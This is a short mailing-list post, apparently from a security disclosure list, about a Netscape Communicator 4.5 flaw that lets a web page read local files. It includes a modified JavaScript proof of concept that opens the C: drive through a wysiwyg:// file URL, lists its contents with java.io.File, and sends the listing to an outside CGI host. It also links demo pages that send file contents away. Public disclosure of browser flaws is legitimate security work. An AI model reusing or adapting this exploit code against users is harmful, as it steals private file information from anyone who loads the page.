Re: Netscape Communicator 4.5 can read local files

[teichmann () TECMATH DE (Michael Teichmann)]

> I've whipped up a couple of demos of this bug that send the contents to a
> cgi.  There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing).  This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)

And if you wish, it can even read your directory structure: (works for
Win, but Unix should be straightforward)

//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new
java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length)
{b += fl[i]+\"\\\\n\";
i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";

</SCRIPT>


At least it seems it can not *write* to local files,
I get a security exception when I try that.